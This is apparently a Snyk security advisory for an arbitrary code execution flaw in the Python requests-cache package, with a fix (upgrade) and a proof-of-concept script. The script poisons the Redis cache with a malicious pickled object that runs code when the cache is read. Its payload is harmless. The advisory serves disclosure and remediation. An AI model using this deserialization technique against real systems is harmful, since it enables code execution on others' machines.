Arbitrary Code Execution Affecting requests-cache package, versions [,0.6.0.dev1)
Snyk CVSS
Attack Complexity
Low
Confidentiality
High
Integrity
High
Availability
High
Threat Intelligence
Exploit Maturity
Proof of concept
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PYTHON-REQUESTSCACHE-1089050
- published 25 Mar 2021
- disclosed 25 Mar 2021
- credit Varbin
How to fix?
Upgrade requests-cache
to version 0.6.0.dev1 or higher.
Overview
requests-cache is a Persistent cache for requests library
Affected versions of this package are vulnerable to Arbitrary Code Execution via accessing the redis cache (with write permissions).
PoC
import requests
import requests_cache
requests_cache.install_cache(cache_name='cache',backend='redis')
requests_cache.clear()
print("Filling cache.")
response = requests.get("https://example.org")
### attacker's part
print('Attacker: "Planting" exploit')
from redis import StrictRedis as Redis
from requests_cache.backends.storage.redisdict import RedisDict
rd = Redis()
class Exploit:
def __reduce__(self):
return (print, ("I won.",))
import pickle
exploit = pickle.dumps(Exploit(), protocol=0)
for key in rd.hgetall("cache:responses").keys():
rd.hset("cache:responses", key, exploit)
print('Attacker: finished')
<h3>end of attacker's part</h3>
print("Accessing cache")
response = requests.get("https://example.org")